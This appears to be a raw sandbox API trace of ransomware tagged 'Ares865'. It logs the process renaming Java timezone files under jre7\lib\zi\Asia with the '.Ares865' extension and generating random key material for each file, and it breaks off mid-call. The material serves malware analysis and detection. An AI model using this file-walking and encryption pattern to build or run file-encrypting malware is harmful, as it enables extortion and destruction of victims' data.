[0134.583] lstrlenW (lpString="Dili") returned 4 [0134.584] lstrlenW (lpString="Ares865") returned 7 [0134.584] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Dili.Ares865") returned 57 [0134.584] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Dili" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\dili"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Dili.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\dili.ares865"), dwFlags=0x1) returned 1 [0134.588] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Dili.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\dili.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.588] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=93) returned 1 [0134.588] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.589] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.589] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.592] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.592] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.593] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.593] lstrcpyW (in: lpString1=0x2cce45a, lpString2="Dubai" | out: lpString1="Dubai") returned="Dubai" [0134.593] lstrlenW (lpString="Dubai") returned 5 [0134.593] lstrlenW (lpString="Ares865") returned 7 [0134.593] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Dubai.Ares865") returned 58 [0134.593] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Dubai" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\dubai"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Dubai.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\dubai.ares865"), dwFlags=0x1) returned 1 [0134.595] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Dubai.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\dubai.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.595] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=65) returned 1 [0134.595] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.596] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.596] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.599] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.599] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.599] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.600] lstrcpyW (in: lpString1=0x2cce45a, lpString2="Dushanbe" | out: lpString1="Dushanbe") returned="Dushanbe" [0134.600] lstrlenW (lpString="Dushanbe") returned 8 [0134.600] lstrlenW (lpString="Ares865") returned 7 [0134.600] lstrcmpiW (lpString1="ushanbe", lpString2="Ares865") returned 1 [0134.600] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Dushanbe.Ares865") returned 61 [0134.600] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Dushanbe" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\dushanbe"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Dushanbe.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\dushanbe.ares865"), dwFlags=0x1) returned 1 [0134.603] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Dushanbe.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\dushanbe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.603] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=261) returned 1 [0134.603] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.604] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.604] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.607] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.607] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.607] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.608] lstrcpyW (in: lpString1=0x2cce45a, lpString2="Gaza" | out: lpString1="Gaza") returned="Gaza" [0134.608] lstrlenW (lpString="Gaza") returned 4 [0134.608] lstrlenW (lpString="Ares865") returned 7 [0134.608] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Gaza.Ares865") returned 57 [0134.608] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Gaza" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\gaza"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Gaza.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\gaza.ares865"), dwFlags=0x1) returned 1 [0134.610] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Gaza.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\gaza.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.610] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1236) returned 1 [0134.611] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.611] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.611] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.614] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.614] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.614] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.615] lstrcpyW (in: lpString1=0x2cce45a, lpString2="Harbin" | out: lpString1="Harbin") returned="Harbin" [0134.615] lstrlenW (lpString="Harbin") returned 6 [0134.615] lstrlenW (lpString="Ares865") returned 7 [0134.615] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Harbin.Ares865") returned 59 [0134.615] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Harbin" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\harbin"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Harbin.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\harbin.ares865"), dwFlags=0x1) returned 1 [0134.617] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Harbin.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\harbin.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.617] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=205) returned 1 [0134.617] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.618] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.618] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.623] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.624] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.624] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.624] lstrcpyW (in: lpString1=0x2cce45a, lpString2="Hebron" | out: lpString1="Hebron") returned="Hebron" [0134.625] lstrlenW (lpString="Hebron") returned 6 [0134.625] lstrlenW (lpString="Ares865") returned 7 [0134.625] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Hebron.Ares865") returned 59 [0134.625] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Hebron" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\hebron"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Hebron.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\hebron.ares865"), dwFlags=0x1) returned 1 [0134.627] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Hebron.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\hebron.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.627] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1252) returned 1 [0134.627] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.628] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.628] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.631] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.631] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.631] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.632] lstrcpyW (in: lpString1=0x2cce45a, lpString2="Hong_Kong" | out: lpString1="Hong_Kong") returned="Hong_Kong" [0134.632] lstrlenW (lpString="Hong_Kong") returned 9 [0134.632] lstrlenW (lpString="Ares865") returned 7 [0134.632] lstrcmpiW (lpString1="ng_Kong", lpString2="Ares865") returned 1 [0134.632] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Hong_Kong.Ares865") returned 62 [0134.632] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Hong_Kong" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\hong_kong"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Hong_Kong.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\hong_kong.ares865"), dwFlags=0x1) returned 1 [0134.636] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Hong_Kong.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\hong_kong.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.636] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=617) returned 1 [0134.637] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.637] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.637] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.640] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.640] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.640] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.641] lstrcpyW (in: lpString1=0x2cce45a, lpString2="Hovd" | out: lpString1="Hovd") returned="Hovd" [0134.641] lstrlenW (lpString="Hovd") returned 4 [0134.641] lstrlenW (lpString="Ares865") returned 7 [0134.641] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Hovd.Ares865") returned 57 [0134.641] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Hovd" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\hovd"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Hovd.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\hovd.ares865"), dwFlags=0x1) returned 1 [0134.643] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Hovd.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\hovd.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.643] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=437) returned 1 [0134.643] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.644] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.644] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.647] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.648] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.648] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.648] lstrcpyW (in: lpString1=0x2cce45a, lpString2="Ho_Chi_Minh" | out: lpString1="Ho_Chi_Minh") returned="Ho_Chi_Minh" [0134.648] lstrlenW (lpString="Ho_Chi_Minh") returned 11 [0134.649] lstrlenW (lpString="Ares865") returned 7 [0134.649] lstrcmpiW (lpString1="hi_Minh", lpString2="Ares865") returned 1 [0134.649] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Ho_Chi_Minh.Ares865") returned 64 [0134.649] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Ho_Chi_Minh" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\ho_chi_minh"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Ho_Chi_Minh.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\ho_chi_minh.ares865"), dwFlags=0x1) returned 1 [0134.651] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Ho_Chi_Minh.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\ho_chi_minh.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.651] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=97) returned 1 [0134.651] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.652] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.652] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.654] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.655] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.655] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.656] lstrcpyW (in: lpString1=0x2cce45a, lpString2="Irkutsk" | out: lpString1="Irkutsk") returned="Irkutsk" [0134.656] lstrlenW (lpString="Irkutsk") returned 7 [0134.656] lstrlenW (lpString="Ares865") returned 7 [0134.656] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Irkutsk.Ares865") returned 60 [0134.656] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Irkutsk" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\irkutsk"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Irkutsk.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\irkutsk.ares865"), dwFlags=0x1) returned 1 [0134.657] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Irkutsk.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\irkutsk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.657] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=581) returned 1 [0134.658] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.658] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.658] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.661] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.662] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.662] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.662] lstrcpyW (in: lpString1=0x2cce45a, lpString2="Jakarta" | out: lpString1="Jakarta") returned="Jakarta" [0134.662] lstrlenW (lpString="Jakarta") returned 7 [0134.662] lstrlenW (lpString="Ares865") returned 7 [0134.663] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Jakarta.Ares865") returned 60 [0134.663] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Jakarta" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\jakarta"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Jakarta.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\jakarta.ares865"), dwFlags=0x1) returned 1 [0134.664] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Jakarta.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\jakarta.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.664] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=129) returned 1 [0134.664] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.665] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.665] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.668] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.668] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.669] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.669] lstrcpyW (in: lpString1=0x2cce45a, lpString2="Jayapura" | out: lpString1="Jayapura") returned="Jayapura" [0134.669] lstrlenW (lpString="Jayapura") returned 8 [0134.669] lstrlenW (lpString="Ares865") returned 7 [0134.669] lstrcmpiW (lpString1="ayapura", lpString2="Ares865") returned 1 [0134.669] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Jayapura.Ares865") returned 61 [0134.669] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Jayapura" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\jayapura"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Jayapura.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\jayapura.ares865"), dwFlags=0x1) returned 1 [0134.671] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Jayapura.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\jayapura.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.671] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=85) returned 1 [0134.672] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.672] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.672] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.675] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.676] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.676] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.676] lstrcpyW (in: lpString1=0x2cce45a, lpString2="Jerusalem" | out: lpString1="Jerusalem") returned="Jerusalem" [0134.676] lstrlenW (lpString="Jerusalem") returned 9 [0134.676] lstrlenW (lpString="Ares865") returned 7 [0134.676] lstrcmpiW (lpString1="rusalem", lpString2="Ares865") returned 1 [0134.677] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Jerusalem.Ares865") returned 62 [0134.677] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Jerusalem" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\jerusalem"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Jerusalem.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\jerusalem.ares865"), dwFlags=0x1) returned 1 [0134.678] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Jerusalem.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\jerusalem.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.678] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1236) returned 1 [0134.679] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.679] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.679] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.682] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, 